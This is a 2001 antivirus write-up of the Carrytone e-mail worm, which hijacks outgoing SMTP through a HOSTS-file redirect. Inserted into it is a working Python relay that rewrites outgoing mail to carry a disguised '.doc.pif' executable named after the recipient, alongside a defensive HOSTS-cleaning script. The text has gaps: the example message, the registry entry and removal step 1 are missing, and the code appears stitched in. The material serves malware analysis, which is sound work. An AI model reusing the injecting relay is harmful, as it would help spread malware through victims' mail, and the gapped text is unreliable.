Carrytone is a mass-mailer that uses a new technique
to spread. The worm body is 40 kilobytes in size and it was
written in C. It works properly on Windows NT-based
systems only.
For spreading it implements a simple SMTP proxy that listens on
port 25 (the standard SMTP port) on the infected machine. When the
worm starts it reads the outgoing SMTP server name from the user's
e-mail settings and adds an entry to the HOSTS file that maps that
server name to the local machine (127.0.0.1), where the worm is
listening. When the user sends an e-mail the e-mail client
therefore connects to the worm instead of the real mail server.
After accepting the connection the worm connects to the real
server itself and relays all commands and replies between the
client and the server unchanged until it sees the server's reply
to the SMTP DATA command (the 354 reply that marks the beginning
of the message text). At this point it inserts a copy of itself
into the message before passing it on. Because the redirection
relies on name resolution, only connections that use the server's
host name pass through the worm.
The attachment name it uses is built from the recipient's
name followed by a double '.doc.pif' extension, so the file is
an executable (.pif) that looks like a Word document.
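The relay step described above, as an added illustration written for this page (it is not the worm's code): the proxy forwards every line verbatim and only rewrites the message once the real server has answered DATA with a 354 reply. Two details are assumptions, not taken from the analysis: that the attachment name is derived from the RCPT TO address, and that the copy is appended as a base64 MIME part. The dialogue and the PAYLOAD placeholder are constructed.

```python
"""Model of the interposed SMTP proxy: client -> relay -> real server.
Added example for this page, not the worm's own code.  PAYLOAD is a
constructed placeholder, not executable content."""
import base64
import re

PAYLOAD = b"MZ-constructed-placeholder-not-real-code"   # constructed placeholder
BOUNDARY = "----=_illustration_boundary"                 # assumed boundary string


def attachment_name(rcpt_line):
    """'RCPT TO:<alice@example.org>' -> 'alice.doc.pif' (assumed derivation)."""
    m = re.search(r"<([^@>]+)", rcpt_line)
    local_part = m.group(1) if m else "unknown"
    return local_part + ".doc.pif"


def inject_attachment(msg_lines, name, payload):
    """Return the withheld message with `payload` added as a MIME attachment.
    Single-line headers only; folded headers are not handled here."""
    blank = msg_lines.index("") if "" in msg_lines else len(msg_lines)
    headers, body = msg_lines[:blank], msg_lines[blank + 1:]
    drop = ("content-type:", "content-transfer-encoding:", "mime-version:")
    kept = [h for h in headers if not h.lower().startswith(drop)]
    b64 = base64.b64encode(payload).decode("ascii")
    return (kept
            + ["MIME-Version: 1.0",
               'Content-Type: multipart/mixed; boundary="%s"' % BOUNDARY, ""]
            + ["--" + BOUNDARY, "Content-Type: text/plain", ""] + body
            + ["--" + BOUNDARY,
               'Content-Type: application/octet-stream; name="%s"' % name,
               "Content-Transfer-Encoding: base64",
               'Content-Disposition: attachment; filename="%s"' % name, ""]
            + [b64[i:i + 76] for i in range(0, len(b64), 76)]
            + ["--" + BOUNDARY + "--"])


class InjectingRelay:
    """State of one proxied SMTP session."""

    def __init__(self, payload):
        self.payload = payload
        self.rcpt = None                # last RCPT TO line seen
        self.expect_data_reply = False  # DATA forwarded, reply not yet seen
        self.in_data = False            # between the 354 reply and the "." line
        self.held = []                  # message lines withheld from the server

    def from_client(self, line):
        """A line from the mail client; returns the lines sent on to the server."""
        if self.in_data:
            if line != ".":
                self.held.append(line)  # withhold until the message is complete
                return []
            self.in_data = False
            rewritten = inject_attachment(self.held,
                                          attachment_name(self.rcpt or ""),
                                          self.payload)
            self.held = []
            return rewritten + ["."]
        upper = line.upper()
        if upper.startswith("RCPT TO:"):
            self.rcpt = line
        elif upper == "DATA":
            self.expect_data_reply = True
        return [line]                   # everything else is relayed unchanged

    def from_server(self, line):
        """A line from the real server; returns the lines sent on to the client."""
        if self.expect_data_reply:
            self.expect_data_reply = False
            self.in_data = line.startswith("354")  # any other reply: no message follows
        return [line]


CLIENT_LINES = [                        # constructed client side of one session
    "EHLO laptop", "MAIL FROM:<bob@example.org>", "RCPT TO:<alice@example.org>",
    "DATA", "From: bob@example.org", "To: alice@example.org", "Subject: hi", "",
    "See you tomorrow.", ".", "QUIT",
]
SERVER_REPLIES = [                      # constructed replies of the real server
    "220 mail.example.org ESMTP", "250 mail.example.org", "250 OK", "250 OK",
    "354 End data with <CR><LF>.<CR><LF>", "250 Queued", "221 Bye",
]


def run_session(relay, client_lines, server_replies):
    """Drive the relay with the scripted dialogue.
    Returns (lines the real server received, lines the client received)."""
    to_server, to_client = [], []
    replies = iter(server_replies)
    to_client += relay.from_server(next(replies))   # 220 greeting
    for line in client_lines:
        forwarded = relay.from_client(line)
        to_server += forwarded
        # the server answers each forwarded command and the end of the message,
        # but says nothing while message lines are being held back
        if forwarded and not relay.in_data:
            to_client += relay.from_server(next(replies))
    return to_server, to_client


if __name__ == "__main__":
    srv, cli = run_session(InjectingRelay(PAYLOAD), CLIENT_LINES, SERVER_REPLIES)
    print("\n".join("server got: " + l for l in srv))
    print("\n".join("client got: " + l for l in cli))
```

Note what the client sees: every reply, including the final 250, is the real server's own, so from the sender's side the session looks entirely normal. The whole message is withheld from the server until the terminating "." arrives, because the attachment has to be placed inside the message structure rather than appended to the end of it.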
Messages look like this:
When the infected attachment is opened it copies itself to
the Windows folder as 'MMOPLIB.EXE' and adds a startup entry
for it under the Run keys in the registry:
2. Once the registry entry has been removed the system has to be
rebooted to make sure that the worm process is no longer active.
After the reboot the worm file, 'MMOPLIB.EXE', can be deleted from
the Windows directory.
3. The HOSTS file has to be cleaned. The file is
'%system_dir%\drivers\etc\hosts'. Every line that maps a mail
server's name to the localhost address (127.0.0.1) must be removed;
the standard '127.0.0.1 localhost' line is legitimate and stays.
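Step 3 as a script, added here for this page (it is not an F-Secure tool): it flags HOSTS entries that map any name other than localhost to a loopback address, optionally restricted to the mail server names taken from the e-mail settings, and writes out the file with those lines removed. The sample file is constructed; the real file lives at the path given in step 3.

```python
"""Find and remove HOSTS entries that point a mail server name at loopback.
Added example for this page; works on the file's text so it can be tried on
the constructed sample before being pointed at the real HOSTS file."""
import ipaddress
import sys

LOCAL_NAMES = {"localhost", "localhost.localdomain"}   # legitimate loopback names

SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1       smtp.example.org        # the kind of entry the worm adds
10.0.0.5        intranet.example.org
"""                                                     # constructed sample file


def parse_hosts_line(line):
    """Return (address, [names]) for an entry, or None for blank/comment lines."""
    fields = line.split("#", 1)[0].split()
    return (fields[0], fields[1:]) if fields else None


def loopback_overrides(hosts_text, mail_hosts=None):
    """List (line_no, line, names) for entries that map a non-localhost name to
    a loopback address.  If `mail_hosts` (lower-case names from the e-mail
    settings) is given, only those names are reported."""
    found = []
    for n, line in enumerate(hosts_text.splitlines(), 1):
        entry = parse_hosts_line(line)
        if entry is None:
            continue
        addr, names = entry
        try:
            if not ipaddress.ip_address(addr).is_loopback:   # 127/8 and ::1
                continue
        except ValueError:
            continue                                       # malformed address
        suspect = [nm for nm in names
                   if nm.lower() not in LOCAL_NAMES
                   and (mail_hosts is None or nm.lower() in mail_hosts)]
        if suspect:
            found.append((n, line, suspect))
    return found


def clean_hosts(hosts_text, mail_hosts=None):
    """Return hosts_text with the flagged lines removed; everything else,
    including the '127.0.0.1 localhost' line and comments, is kept verbatim."""
    bad = {n for n, _, _ in loopback_overrides(hosts_text, mail_hosts)}
    kept = [l for n, l in enumerate(hosts_text.splitlines(), 1) if n not in bad]
    return "\n".join(kept) + ("\n" if hosts_text.endswith("\n") else "")


if __name__ == "__main__":
    # usage: python clean_hosts.py <path-to-hosts>   (cleaned file on stdout,
    # flagged lines on stderr); with no argument the constructed sample is used
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HOSTS
    for n, line, names in loopback_overrides(text):
        sys.stderr.write("line %d maps %s to loopback: %s\n"
                         % (n, ", ".join(names), line.strip()))
    sys.stdout.write(clean_hosts(text))
```

Review the flagged lines before overwriting the file: a loopback entry for some other name may be a deliberate local override rather than the worm's. Passing the mail server names from the e-mail settings as `mail_hosts` limits the removal to exactly the entries step 3 describes.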
NOTE: F-Secure Anti-Virus does not yet detect this virus. Detection
will be shipped after Christmas 2001. Then again, this virus is not
widespread at all. Merry Christmas.
[Analysis: Gergely Erdelyi; F-Secure Corp.; 21st of December, 2001]